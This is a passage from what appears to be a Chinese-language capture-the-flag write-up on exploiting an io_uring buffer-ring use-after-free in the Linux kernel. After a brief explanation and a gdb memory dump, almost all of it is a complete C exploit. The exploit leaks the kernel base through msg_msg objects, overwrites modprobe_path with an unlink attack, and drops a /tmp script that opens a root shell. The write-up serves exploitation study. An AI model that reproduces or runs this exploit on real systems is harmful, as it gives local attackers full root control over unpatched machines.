tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; // 自旋指针,worker继续卡死不然会导致crash

tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8; // fake_msg.m_list.prev
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f; // fake_msg.m_list.next
tmp[IDX(0x810 - 0x60)] = 0x00001; // fake_msg.m_type
tmp[IDX(0x818 - 0x60)] = 0xFD0; // fake_msg.m_ts
tmp[IDX(0x820 - 0x60)] = 0; // fake_msg.next
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // fake_msg.security(指向可读区域)

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");
sleep(2);

if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

用同样的方法控制 msg_msg,不过这次的目的是修改 msg_msg.m_list

1
2
3
4
5
6
7
8
100:08000xffff888005bfd800 —▸ 0xffffffff82e51258 ◂— 0x0
101:08080xffff888005bfd808 ◂— 0x612f706d742f /* '/tmp/a' */
102:08100xffff888005bfd810 ◂— 0x1
103:08180xffff888005bfd818 ◂— 0xfd0
104:08200xffff888005bfd820 —▸ 0xffff888005bfd420 ◂— 0xffff888005bfd420
105:08280xffff888005bfd828 —▸ 0xffff888005bfd840 ◂— 0x6161616161616161 ('aaaaaaaa')
106:08300xffff888005bfd830 ◂— 0x6161616161616161 ('aaaaaaaa')
107:08380xffff888005bfd838 ◂— 0x6161616161616161 ('aaaaaaaa')

最后触发 msg_msg unlink attack 即可完成提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>
#include <linux/io_uring.h>
#include <stdatomic.h>

#include "kernelpwn.h"

#define MSG_QUEUE_NUM 0x10

#define PAGE_SIZE 0x1000
#define BUFFER_LEN (PAGE_SIZE * 8)
#define PBUF_BASE ((void*)0x1000)

#define IORING_REGISTER_PBUF_RING (22)
#define IORING_UNREGISTER_PBUF_RING (23)

#define IORING_OP_PROVIDE_BUFFERS (31)

//内存屏障宏
#define io_uring_smp_store_release(p, v) \
atomic_store_explicit((_Atomic typeof(*(p))*)(p), (v), \
memory_order_release)

#define io_uring_smp_load_acquire(p) \
atomic_load_explicit((_Atomic typeof(*(p))*)(p), \
memory_order_acquire)

struct io_uring_buf_reg {
__u64 ring_addr;
__u32 ring_entries;
__u16 bgid;
__u16 pad;
__u64 resv[3];
};

struct new_io_uring_sqe {
__u8 opcode; /* type of operation for this sqe */
__u8 flags; /* IOSQE_ flags */
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
};
__u64 __pad2[2];
};

int uring_fd;
char* buffer;
struct new_io_uring_sqe* sqes;
unsigned *sring_tail, *sring_mask, *sring_array, *cring_head;
int msgid[MSG_QUEUE_NUM];

void* worker(void* res)
{
msgrcv(msgid[0], res, PAGE_SIZE, (long)PBUF_BASE, 0);
puts("shouldn't get here");
}

void* do_mmap(void* base, size_t len)
{
int flags = MAP_ANONYMOUS | MAP_PRIVATE;
if (base)
flags |= MAP_FIXED;

void* res = mmap(base, len, PROT_READ | PROT_WRITE, flags, -1, 0);
if ((size_t)res == -1 || (base && (res != base))) {
err_exit("mmap");
exit(-1);
}
memset(res, '\x00', len);
return res;
}

int io_uring_setup(unsigned entries, struct io_uring_params* p)
{
return (int)syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_register(unsigned int fd, unsigned int opcode,
void* arg, unsigned int nr_args)
{
return (int)syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int io_uring_enter(int ring_fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags)
{
return (int)syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete, flags, NULL, 0);
}

void submit_provide_buffer(void){
io_uring_smp_store_release(&sring_array[0], 0);

int tail = *sring_tail;
tail++;
io_uring_smp_store_release(sring_tail, tail);

int ret = io_uring_enter(uring_fd, 1, 1, IORING_ENTER_GETEVENTS);

int head = io_uring_smp_load_acquire(cring_head);
head++;
io_uring_smp_store_release(cring_head, head);
}

void init_io_uring(void){ /* kmalloc-2k */
struct io_uring_params p = {0};

uring_fd = io_uring_setup(0x1, &p);
int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
int sqes_sz = p.sq_entries * sizeof(struct new_io_uring_sqe);

unsigned char* sq_ptr = mmap(NULL, sring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING);

sring_tail = (unsigned int*)(sq_ptr + p.sq_off.tail);
sring_mask = (unsigned int*)(sq_ptr + p.sq_off.ring_mask);
sring_array = (unsigned int*)(sq_ptr + p.sq_off.array);

sqes = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES); /* 提交队列项 */

unsigned char* cq_ptr = mmap(NULL, cring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING);

cring_head = (unsigned int*)(cq_ptr + p.cq_off.head);

buffer = do_mmap(0, BUFFER_LEN);
if (buffer == NULL) {
err_exit("malloc buffer");
}
}

int do_free_first(void)
{
int ret;

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.ring_addr = 0xF00000000;
reg.ring_entries = 0x20000000;
reg.bgid = 0x0;

ret = io_uring_register(uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1);
return ret;
}

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 2048 - 320*2 = 1408
*/
char fake_secondary_msg[1408];

int main(int argc , char **argv, char **envp)
{
int ret;
int sk_sockets[SOCKET_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid;

save_status();
unshare_setup();

init_io_uring();

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msgid[i] = msgget((key_t)1234 + i, 0666 | IPC_CREAT | IPC_EXCL)) < 0)
err_exit("failed to create msg_queue!");
}

do_free_first();

puts("try to get UAF object");

struct msgbuf* msg = (struct msgbuf*)buffer;
int msg_len = 0x420 - 0x30;
msg->mtype = 0x0001;
memset(msg->mtext, '\x00', msg_len);
msgsnd(msgid[0], msg, msg_len, 0);

void* pbuf = do_mmap(PBUF_BASE, PAGE_SIZE);
sqes->opcode = IORING_OP_PROVIDE_BUFFERS;
sqes->rw_flags = 0;
sqes->splice_fd_in = 0;
sqes->fd = 1;
sqes->addr = (uint64_t)pbuf;
sqes->len = 0xFD0;
sqes->buf_group = 0;
submit_provide_buffer();

for (int i = 0; i < 0x2; i++) {
sqes->addr = (uint64_t)malloc(0x100);
sqes->len = 0x100;
sqes->buf_group = 0x21;
submit_provide_buffer();
}

puts("submit_provide_buffer");

uint64_t* tag = (uint64_t*)(buffer + 0xF00);
*tag = 0xdeadbeef;
pthread_t th;
pthread_create(&th, NULL, worker, buffer);

while (*tag == 0xdeadbeef){
}
//print_hex(buffer,0xf80);

uint64_t io_bl = *((uint64_t*)(buffer + 0x18)) - 0x420;
printf("io_bl = 0x%lx\n",io_bl);

msg_len = 0x800 - 0x30;
memset(msg->mtext, 0x00, msg_len);
msgsnd(msgid[2], msg, msg_len, 0);

int spray_uring_fd;
struct io_uring_params p;
memset(&p, 0, sizeof(p));
spray_uring_fd = io_uring_setup(0x1, &p);

ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0);

#define IDX(x) (((x)-0x30) / 8)

uint64_t* tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x40)] = io_bl + 0x60;
tmp[IDX(0x48)] = io_bl;
tmp[IDX(0x50)] = 0x10000;
tmp[IDX(0x60)] = io_bl + 0x68;
tmp[IDX(0x68)] = 0xdeadbeef;

tmp[IDX(0x80)] = io_bl + 0xa0;
tmp[IDX(0x88)] = io_bl;
tmp[IDX(0x90)] = 0x10000;
tmp[IDX(0xa0)] = io_bl + 0x1000;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[1], msg, msg_len, 0);

struct io_uring_buf_reg reg;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0x2;
ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

tmp[IDX(0x800 - 0x60)] = io_bl + 0x830;
tmp[IDX(0x808 - 0x60)] = io_bl + 0x830;
tmp[IDX(0x810 - 0x60)] = 0x00001;
tmp[IDX(0x818 - 0x60)] = 0xFD0;
tmp[IDX(0x820 - 0x60)] = 0;
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;
tmp[IDX(0x830 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

msg_len = 0x800 - 0x30;
ret = msgsnd(msgid[3], msg, msg_len, 0);

msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);
//print_hex(io_ring_ctx, 0x200);

kernel_offset = io_ring_ctx[0x420 / 8] - 0xffffffff810a8470;
kernel_base = kernel_offset + 0xffffffff81000000;
uint64_t modprobe_path = kernel_offset + 0xFFFFFFFF82E51260;

printf("io_ring_ctx->fallback_work: 0x%lx\n",io_ring_ctx[0x420 / 8]);
printf("kernel_offset: 0x%lx\n",kernel_offset);
printf("kernel_base: 0x%lx\n",kernel_base);
printf("modprobe_path: 0x%lx\n",modprobe_path);

msg_len = 0x800 - 0x30;
memset(msg->mtext, 'a', msg_len);
msgsnd(msgid[4], msg, msg_len, 0);

ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

tmp = (uint64_t*)msg->mtext;
tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8;
tmp[IDX(0x808 - 0x60)] = 0x612f706d742f;
tmp[IDX(0x810 - 0x60)] = 0x00001;
tmp[IDX(0x818 - 0x60)] = 0xFD0;
tmp[IDX(0x820 - 0x60)] = 0;
tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;

msg_len = 0x800 - 0x30;
msgsnd(msgid[5], msg, msg_len, 0);
puts("try to msg unlink attack");

if (fork() == 0) {
msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
}

sleep(2);
int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
read(fd, buffer, 0x10);
puts(buffer);
close(fd);

fd = open("/tmp/a", O_RDWR|O_CREAT);
char *script = "#!/bin/sh\nchmod 777 /flag\nsetsid cttyhack setuidgid 0 /bin/sh\n";
write(fd, script, strlen(script));
close(fd);
system("chmod 777 /tmp/a");

int ff = open("/tmp/asd", O_WRONLY | O_CREAT);
write(ff, "\xff\xff\xff\xff", 4);
close(ff);

system("chmod 777 /tmp/asd; /tmp/asd");
if(fork()==0)
system("/bin/sh");

puts("alive");
while (1)
;

return 0;
}